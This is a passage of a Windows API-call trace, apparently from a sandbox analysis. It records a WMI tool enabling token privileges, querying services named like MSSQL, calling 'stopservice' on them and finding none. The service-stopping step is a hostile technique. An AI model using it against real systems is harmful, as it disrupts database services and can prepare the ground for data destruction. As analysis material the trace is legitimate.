[0240.793] free (_Block=0x43cbc0) [0240.793] malloc (_Size=0x18) returned 0x43cbc0 [0240.793] IUnknown:Release (This=0x1e413b0) returned 0x0 [0240.793] malloc (_Size=0x70) returned 0x43d010 [0240.793] malloc (_Size=0x70) returned 0x43d1d0 [0240.793] malloc (_Size=0x48) returned 0x43d090 [0240.793] malloc (_Size=0x18) returned 0x43cc20 [0240.793] malloc (_Size=0x70) returned 0x43d250 [0240.793] malloc (_Size=0x70) returned 0x43d2d0 [0240.793] malloc (_Size=0x48) returned 0x43d350 [0240.793] malloc (_Size=0x50) returned 0x43d3a0 [0240.793] malloc (_Size=0x70) returned 0x43d400 [0240.793] malloc (_Size=0x70) returned 0x43d480 [0240.793] malloc (_Size=0x48) returned 0x43d500 [0240.793] free (_Block=0x43d350) [0240.793] free (_Block=0x43d2d0) [0240.793] free (_Block=0x43d250) [0240.793] free (_Block=0x43d090) [0240.793] free (_Block=0x43d1d0) [0240.793] free (_Block=0x43d010) [0240.794] IUnknown:Release (This=0x1e7c4a0) returned 0x0 [0240.794] free (_Block=0x43d180) [0240.794] free (_Block=0x43d100) [0240.794] free (_Block=0x43cf90) [0240.794] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x1ad1f8*=0x0, ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x0 | out: pstrName=0x1ad1f8*="PauseService", ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x1e7c4a0) returned 0x0 [0240.794] lstrlenW (lpString="PauseService") returned 12 [0240.794] lstrlenW (lpString="stopservice") returned 11 [0240.794] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0240.794] IUnknown:Release (This=0x1e7c4a0) returned 0x0 [0240.794] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x1ad1f8*=0x0, ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x0 | out: pstrName=0x1ad1f8*="ResumeService", ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x1e7c4a0) returned 0x0 [0240.794] lstrlenW (lpString="ResumeService") returned 13 [0240.794] lstrlenW (lpString="stopservice") returned 11 [0240.794] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0240.794] IUnknown:Release (This=0x1e7c4a0) returned 0x0 [0240.794] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x1ad1f8*=0x0, ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x0 | out: pstrName=0x1ad1f8*="InterrogateService", ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x1e7c4a0) returned 0x0 [0240.794] lstrlenW (lpString="InterrogateService") returned 18 [0240.794] lstrlenW (lpString="stopservice") returned 11 [0240.794] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0240.795] IUnknown:Release (This=0x1e7c4a0) returned 0x0 [0240.795] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x1ad1f8*=0x0, ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x0 | out: pstrName=0x1ad1f8*="UserControlService", ppInSignature=0x1ad200*=0x1e7c520, ppOutSignature=0x1ad208*=0x1e7ca20) returned 0x0 [0240.795] lstrlenW (lpString="UserControlService") returned 18 [0240.795] lstrlenW (lpString="stopservice") returned 11 [0240.795] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0240.795] IUnknown:Release (This=0x1e7c520) returned 0x0 [0240.795] IUnknown:Release (This=0x1e7ca20) returned 0x0 [0240.795] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x1ad1f8*=0x0, ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x0 | out: pstrName=0x1ad1f8*="Create", ppInSignature=0x1ad200*=0x1e7e470, ppOutSignature=0x1ad208*=0x1e7e970) returned 0x0 [0240.795] lstrlenW (lpString="Create") returned 6 [0240.795] lstrlenW (lpString="stopservice") returned 11 [0240.796] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0240.796] IUnknown:Release (This=0x1e7e470) returned 0x0 [0240.796] IUnknown:Release (This=0x1e7e970) returned 0x0 [0240.796] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x1ad1f8*=0x0, ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x0 | out: pstrName=0x1ad1f8*="Change", ppInSignature=0x1ad200*=0x1e7e1f0, ppOutSignature=0x1ad208*=0x1e7e6f0) returned 0x0 [0240.796] lstrlenW (lpString="Change") returned 6 [0240.796] lstrlenW (lpString="stopservice") returned 11 [0240.796] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0240.796] IUnknown:Release (This=0x1e7e1f0) returned 0x0 [0240.796] IUnknown:Release (This=0x1e7e6f0) returned 0x0 [0240.796] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x1ad1f8*=0x0, ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x0 | out: pstrName=0x1ad1f8*="ChangeStartMode", ppInSignature=0x1ad200*=0x1e7c610, ppOutSignature=0x1ad208*=0x1e7cb10) returned 0x0 [0240.796] lstrlenW (lpString="ChangeStartMode") returned 15 [0240.796] lstrlenW (lpString="stopservice") returned 11 [0240.796] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0240.796] IUnknown:Release (This=0x1e7c610) returned 0x0 [0240.796] IUnknown:Release (This=0x1e7cb10) returned 0x0 [0240.796] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x1ad1f8*=0x0, ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x0 | out: pstrName=0x1ad1f8*="Delete", ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x1e7c4a0) returned 0x0 [0240.796] lstrlenW (lpString="Delete") returned 6 [0240.797] lstrlenW (lpString="stopservice") returned 11 [0240.797] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0240.797] IUnknown:Release (This=0x1e7c4a0) returned 0x0 [0240.797] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x1ad1f8*=0x0, ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x0 | out: pstrName=0x1ad1f8*="GetSecurityDescriptor", ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x1e7c640) returned 0x0 [0240.797] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0240.797] lstrlenW (lpString="stopservice") returned 11 [0240.797] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0240.797] IUnknown:Release (This=0x1e7c640) returned 0x0 [0240.797] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x1ad1f8*=0x0, ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x0 | out: pstrName=0x1ad1f8*="SetSecurityDescriptor", ppInSignature=0x1ad200*=0x1e7c520, ppOutSignature=0x1ad208*=0x1e7ca20) returned 0x0 [0240.797] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0240.797] lstrlenW (lpString="stopservice") returned 11 [0240.797] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0240.797] IUnknown:Release (This=0x1e7c520) returned 0x0 [0240.797] IUnknown:Release (This=0x1e7ca20) returned 0x0 [0240.797] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x1ad1f8*=0x0, ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x0 | out: pstrName=0x1ad1f8*=0x0, ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x0) returned 0x40005 [0240.798] IUnknown:Release (This=0x1e7bfa0) returned 0x0 [0240.798] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0240.798] lstrlenW (lpString="SET") returned 3 [0240.798] lstrlenW (lpString="call") returned 4 [0240.798] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0240.798] lstrlenW (lpString="CREATE") returned 6 [0240.798] lstrlenW (lpString="call") returned 4 [0240.798] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0240.798] free (_Block=0x438640) [0240.798] malloc (_Size=0x8) returned 0x437140 [0240.798] lstrlenW (lpString="GET") returned 3 [0240.798] lstrlenW (lpString="call") returned 4 [0240.798] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0240.798] lstrlenW (lpString="LIST") returned 4 [0240.798] lstrlenW (lpString="call") returned 4 [0240.798] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0240.798] lstrlenW (lpString="ASSOC") returned 5 [0240.798] lstrlenW (lpString="call") returned 4 [0240.798] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0240.798] WbemLocator:IUnknown:AddRef (This=0x1e41390) returned 0x3 [0240.798] free (_Block=0x437fb0) [0240.799] lstrlenW (lpString="") returned 0 [0240.799] lstrlenW (lpString="XDUWTFONO") returned 9 [0240.799] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0240.799] lstrlenW (lpString="XDUWTFONO") returned 9 [0240.799] malloc (_Size=0x14) returned 0x43cc40 [0240.799] lstrlenW (lpString="XDUWTFONO") returned 9 [0240.799] GetCurrentThreadId () returned 0xb2c [0240.799] GetCurrentProcess () returned 0xffffffffffffffff [0240.799] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1af540 | out: TokenHandle=0x1af540*=0x298) returned 1 [0240.799] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1af538 | out: TokenInformation=0x0, ReturnLength=0x1af538) returned 0 [0240.799] malloc (_Size=0x118) returned 0x43cf90 [0240.799] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x43cf90, TokenInformationLength=0x118, ReturnLength=0x1af538 | out: TokenInformation=0x43cf90, ReturnLength=0x1af538) returned 1 [0240.799] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0x43cf90*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=163428406, Attributes=0xa64f), (Luid.LowPart=0x0, Luid.HighPart=4419472, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=33554434, Attributes=0xa658), (Luid.LowPart=0x0, Luid.HighPart=4391256, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x1000a652))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0240.799] free (_Block=0x43cf90) [0240.799] CloseHandle (hObject=0x298) returned 1 [0240.799] lstrlenW (lpString="GET") returned 3 [0240.799] lstrlenW (lpString="call") returned 4 [0240.799] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0240.799] lstrlenW (lpString="LIST") returned 4 [0240.799] lstrlenW (lpString="call") returned 4 [0240.799] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0240.799] lstrlenW (lpString="SET") returned 3 [0240.800] lstrlenW (lpString="call") returned 4 [0240.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0240.800] lstrlenW (lpString="CALL") returned 4 [0240.800] lstrlenW (lpString="call") returned 4 [0240.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0240.800] ??0CHString@@QEAA@XZ () returned 0x1af4f0 [0240.800] GetCurrentThreadId () returned 0xb2c [0240.800] malloc (_Size=0x18) returned 0x43cc60 [0240.800] malloc (_Size=0x18) returned 0x43cc80 [0240.800] malloc (_Size=0x18) returned 0x43cca0 [0240.800] malloc (_Size=0x18) returned 0x43ccc0 [0240.800] malloc (_Size=0x18) returned 0x43cce0 [0240.800] SysStringLen (param_1="\\\\") returned 0x2 [0240.800] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0240.800] malloc (_Size=0x18) returned 0x43cd00 [0240.800] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0240.801] SysStringLen (param_1="\\") returned 0x1 [0240.801] malloc (_Size=0x18) returned 0x43d580 [0240.801] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0240.801] SysStringLen (param_1="root\\cimv2") returned 0xa [0240.801] free (_Block=0x43cd00) [0240.801] free (_Block=0x43cce0) [0240.801] free (_Block=0x43ccc0) [0240.801] free (_Block=0x43cca0) [0240.801] free (_Block=0x43cc80) [0240.801] free (_Block=0x43cc60) [0240.801] malloc (_Size=0x18) returned 0x43cc60 [0240.801] malloc (_Size=0x18) returned 0x43cc80 [0240.801] malloc (_Size=0x18) returned 0x43cca0 [0240.801] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e41390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff2d29d0 | out: ppNamespace=0xff2d29d0*=0x1e53b28) returned 0x0 [0240.808] free (_Block=0x43cca0) [0240.808] free (_Block=0x43cc80) [0240.808] free (_Block=0x43cc60) [0240.808] CoSetProxyBlanket (pProxy=0x1e53b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0240.808] free (_Block=0x43d580) [0240.808] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0240.808] ??0CHString@@QEAA@XZ () returned 0x1af298 [0240.808] GetCurrentThreadId () returned 0xb2c [0240.808] malloc (_Size=0x70) returned 0x43cf90 [0240.808] malloc (_Size=0x50) returned 0x43d010 [0240.808] malloc (_Size=0x50) returned 0x43d070 [0240.809] malloc (_Size=0x70) returned 0x43d0d0 [0240.809] malloc (_Size=0x70) returned 0x43d150 [0240.809] malloc (_Size=0x48) returned 0x43d1d0 [0240.809] malloc (_Size=0x18) returned 0x43cc60 [0240.809] lstrlenA (lpString="") returned 0 [0240.809] malloc (_Size=0x2) returned 0x437fb0 [0240.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff26314c, cbMultiByte=-1, lpWideCharStr=0x437fb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0240.809] free (_Block=0x437fb0) [0240.809] malloc (_Size=0x70) returned 0x43d220 [0240.809] malloc (_Size=0x48) returned 0x43d2a0 [0240.809] malloc (_Size=0x18) returned 0x43cc80 [0240.809] free (_Block=0x43cc60) [0240.809] IWbemServices:GetObject (in: This=0x1e53b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x1af2c8*=0x0, ppCallResult=0x0 | out: ppObject=0x1af2c8*=0x1e7c030, ppCallResult=0x0) returned 0x0 [0240.829] malloc (_Size=0x18) returned 0x43cc60 [0240.829] IWbemClassObject:GetMethod (in: This=0x1e7c030, wszName="stopservice", lFlags=0, ppInSignature=0x1af2c0, ppOutSignature=0x1af2d8 | out: ppInSignature=0x1af2c0*=0x0, ppOutSignature=0x1af2d8*=0x1e7c530) returned 0x0 [0240.830] free (_Block=0x43cc60) [0240.830] IUnknown:Release (This=0x1e7c530) returned 0x0 [0240.830] IUnknown:Release (This=0x1e7c030) returned 0x0 [0240.830] ??0CHString@@QEAA@XZ () returned 0x1af0e0 [0240.830] GetCurrentThreadId () returned 0xb2c [0240.830] malloc (_Size=0x18) returned 0x43cc60 [0240.830] lstrlenA (lpString="") returned 0 [0240.830] malloc (_Size=0x2) returned 0x437fb0 [0240.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff26314c, cbMultiByte=-1, lpWideCharStr=0x437fb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0240.830] free (_Block=0x437fb0) [0240.830] malloc (_Size=0x18) returned 0x43cca0 [0240.830] lstrlenA (lpString="") returned 0 [0240.830] malloc (_Size=0x2) returned 0x437fb0 [0240.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff26314c, cbMultiByte=-1, lpWideCharStr=0x437fb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0240.830] free (_Block=0x437fb0) [0240.830] malloc (_Size=0x18) returned 0x43ccc0 [0240.830] free (_Block=0x43cca0) [0240.831] malloc (_Size=0x18) returned 0x43cca0 [0240.831] lstrlenA (lpString="SELECT * FROM ") returned 14 [0240.831] malloc (_Size=0x1e) returned 0x43d2f0 [0240.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff264a40, cbMultiByte=-1, lpWideCharStr=0x43d2f0, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0240.831] free (_Block=0x43d2f0) [0240.831] malloc (_Size=0x18) returned 0x43cce0 [0240.831] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0240.831] SysStringLen (param_1="Win32_Service") returned 0xd [0240.831] free (_Block=0x43cca0) [0240.831] malloc (_Size=0x18) returned 0x43cca0 [0240.831] malloc (_Size=0x18) returned 0x43cd00 [0240.831] lstrlenA (lpString=" WHERE ") returned 7 [0240.831] malloc (_Size=0x10) returned 0x43d580 [0240.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff263e20, cbMultiByte=-1, lpWideCharStr=0x43d580, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0240.831] free (_Block=0x43d580) [0240.831] malloc (_Size=0x18) returned 0x43d580 [0240.831] SysStringLen (param_1=" WHERE ") returned 0x7 [0240.832] SysStringLen (param_1="name like '%%MSSQL%%'") returned 0x15 [0240.832] malloc (_Size=0x18) returned 0x43d5a0 [0240.832] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0240.832] SysStringLen (param_1=" WHERE name like '%%MSSQL%%'") returned 0x1c [0240.832] free (_Block=0x43cce0) [0240.832] free (_Block=0x43d580) [0240.832] free (_Block=0x43cd00) [0240.832] free (_Block=0x43cca0) [0240.832] malloc (_Size=0x18) returned 0x43cca0 [0240.833] IWbemServices:ExecQuery (in: This=0x1e53b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%MSSQL%%'", lFlags=48, pCtx=0x0, ppEnum=0x1af0c8 | out: ppEnum=0x1af0c8*=0x1e53c28) returned 0x0 [0240.855] free (_Block=0x43cca0) [0240.855] CoSetProxyBlanket (pProxy=0x1e53c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0240.858] IEnumWbemClassObject:Next (in: This=0x1e53c28, lTimeout=-1, uCount=0x1, apObjects=0x1af0d0, puReturned=0x1af258 | out: apObjects=0x1af0d0*=0x0, puReturned=0x1af258*=0x0) returned 0x1 [0242.593] IUnknown:Release (This=0x1e53c28) returned 0x0 [0242.595] free (_Block=0x43d5a0) [0242.595] free (_Block=0x43ccc0) [0242.595] free (_Block=0x43cc60) [0242.595] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0242.595] free (_Block=0x43cc80) [0242.595] free (_Block=0x43d1d0) [0242.595] free (_Block=0x43d150) [0242.595] free (_Block=0x43d0d0) [0242.595] free (_Block=0x43d070) [0242.595] free (_Block=0x43d010) [0242.595] free (_Block=0x43d2a0) [0242.595] free (_Block=0x43d220) [0242.596] free (_Block=0x43cf90) [0242.596] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0242.596] GetCurrentThreadId () returned 0xb2c [0242.596] ??0CHString@@QEAA@PEBG@Z () returned 0x1af5e8 [0242.596] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x1af5e8 [0242.596] malloc (_Size=0x800) returned 0x43dd50 [0242.596] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x43dd50, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0242.596] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0242.596] malloc (_Size=0x1c) returned 0x43cf90 [0242.597] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x43cf90, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0242.597] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0242.597] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0242.597] free (_Block=0x43cf90) [0242.597] free (_Block=0x43dd50) [0242.597] ??1CHString@@QEAA@XZ () returned 0x26bdb801 [0242.597] WbemLocator:IUnknown:Release (This=0x1e53b28) returned 0x0 [0242.598] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0242.598] _kbhit () returned 0x0 [0242.599] free (_Block=0x437140) [0242.599] free (_Block=0x43cac0) [0242.599] free (_Block=0x43caa0) [0242.599] free (_Block=0x43ca80) [0242.599] free (_Block=0x43ca60) [0242.599] free (_Block=0x43ce10) [0242.599] free (_Block=0x43cf60) [0242.599] free (_Block=0x437110) [0242.599] free (_Block=0x438680) [0242.599] free (_Block=0x43cb60) [0242.599] free (_Block=0x43cb80) [0242.599] free (_Block=0x436e70) [0242.600] free (_Block=0x43d500) [0242.600] free (_Block=0x43cba0) [0242.600] free (_Block=0x43cc00) [0242.600] free (_Block=0x43d480) [0242.600] free (_Block=0x43d400) [0242.600] free (_Block=0x43cbe0) [0242.600] free (_Block=0x43cbc0) [0242.600] free (_Block=0x43cc20) [0242.600] free (_Block=0x43d3a0) [0242.600] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0242.600] free (_Block=0x43cea0) [0242.600] free (_Block=0x43cb00) [0242.600] free (_Block=0x43cf30) [0242.600] free (_Block=0x43cb40) [0242.600] free (_Block=0x438600) [0242.600] free (_Block=0x43cb20) [0242.600] free (_Block=0x43cae0) [0242.600] free (_Block=0x437f60) [0242.600] free (_Block=0x436970) [0242.600] free (_Block=0x4369c0) [0242.600] free (_Block=0x43cc40) [0242.600] free (_Block=0x436a90) [0242.601] free (_Block=0x436e50) [0242.601] free (_Block=0x438040) [0242.601] free (_Block=0x436e30) [0242.601] free (_Block=0x438000) [0242.601] free (_Block=0x436dd0) [0242.601] free (_Block=0x436df0) [0242.601] free (_Block=0x436cb0) [0242.601] free (_Block=0x436cd0) [0242.601] free (_Block=0x436c50) [0242.601] free (_Block=0x436c70) [0242.601] free (_Block=0x436d10) [0242.601] free (_Block=0x436d30) [0242.601] free (_Block=0x436d70) [0242.601] free (_Block=0x436d90) [0242.601] free (_Block=0x436b90) [0242.601] free (_Block=0x436bb0) [0242.601] free (_Block=0x436b30) [0242.601] free (_Block=0x436b50) [0242.601] free (_Block=0x436bf0) [0242.602] free (_Block=0x436c10) [0242.602] free (_Block=0x436ad0) [0242.602] free (_Block=0x436af0) [0242.602] free (_Block=0x436a40) [0242.602] free (_Block=0x436a10) [0242.602] free (_Block=0x436f00) [0242.602] WbemLocator:IUnknown:Release (This=0x1e41390) returned 0x2 [0242.602] WbemLocator:IUnknown:Release (This=0x1e53a98) returned 0x0 [0242.603] WbemLocator:IUnknown:Release (This=0x1e41390) returned 0x1 [0242.603] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0242.603] WbemLocator:IUnknown:Release (This=0x1e41390) returned 0x0 [0242.603] free (_Block=0x43c9e0) [0242.603] free (_Block=0x43ca00) [0242.603] free (_Block=0x438540) [0242.603] free (_Block=0x43ca20) [0242.603] free (_Block=0x43ca40) [0242.603] free (_Block=0x438580) [0242.603] free (_Block=0x43c860) [0242.603] free (_Block=0x43c880) [0242.603] free (_Block=0x4383c0) [0242.603] free (_Block=0x43c8a0) [0242.603] free (_Block=0x43c8c0) [0242.603] free (_Block=0x438400) [0242.603] free (_Block=0x43c7e0) [0242.603] free (_Block=0x43c800) [0242.604] free (_Block=0x438340) [0242.604] free (_Block=0x43c820) [0242.604] free (_Block=0x43c840) [0242.604] free (_Block=0x438380) [0242.604] free (_Block=0x43c960) [0242.604] free (_Block=0x43c980) [0242.604] free (_Block=0x4384c0) [0242.604] free (_Block=0x43c9a0) [0242.604] free (_Block=0x43c9c0) [0242.604] free (_Block=0x438500) [0242.604] free (_Block=0x43c760) [0242.604] free (_Block=0x43c780) [0242.604] free (_Block=0x4382c0) [0242.604] free (_Block=0x43c7a0) [0242.604] free (_Block=0x43c7c0) [0242.604] free (_Block=0x438300) [0242.604] free (_Block=0x43c8e0) [0242.604] free (_Block=0x43c900) [0242.604] free (_Block=0x438440) [0242.605] free (_Block=0x43c920) [0242.605] free (_Block=0x43c940) [0242.605] free (_Block=0x438480) [0242.605] free (_Block=0x43c6a0) [0242.605] free (_Block=0x43c6c0) [0242.605] free (_Block=0x438200) [0242.605] free (_Block=0x43c560) [0242.605] free (_Block=0x43c580) [0242.605] free (_Block=0x4380c0) [0242.605] free (_Block=0x436ec0) [0242.605] free (_Block=0x436ee0) [0242.605] free (_Block=0x438080) [0242.605] free (_Block=0x43c5e0) [0242.605] free (_Block=0x43c600) [0242.605] free (_Block=0x438140) [0242.605] free (_Block=0x43c6e0) [0242.605] free (_Block=0x43c700) [0242.605] free (_Block=0x438240) [0242.605] free (_Block=0x43c5a0) [0242.606] free (_Block=0x43c5c0) [0242.606] free (_Block=0x438100) [0242.606] free (_Block=0x43c620) [0242.606] free (_Block=0x43c640) [0242.606] free (_Block=0x438180) [0242.606] free (_Block=0x43c660) [0242.606] free (_Block=0x43c680) [0242.606] free (_Block=0x4381c0) [0242.606] free (_Block=0x43c720) [0242.606] free (_Block=0x43c740) [0242.606] free (_Block=0x438280) [0242.606] CoUninitialize () [0242.650] exit (_Code=0) [0242.650] free (_Block=0x43cd30) [0242.650] free (_Block=0x437f20) [0242.650] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0242.650] free (_Block=0x436fb0) [0242.650] free (_Block=0x436ab0) [0242.650] free (_Block=0x437ee0) [0242.651] free (_Block=0x437ea0) [0242.651] free (_Block=0x437e50) [0242.651] free (_Block=0x437e10) [0242.651] free (_Block=0x435ac0) [0242.651] free (_Block=0x437d90) [0242.651] free (_Block=0x435a80) [0242.651] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0242.651] free 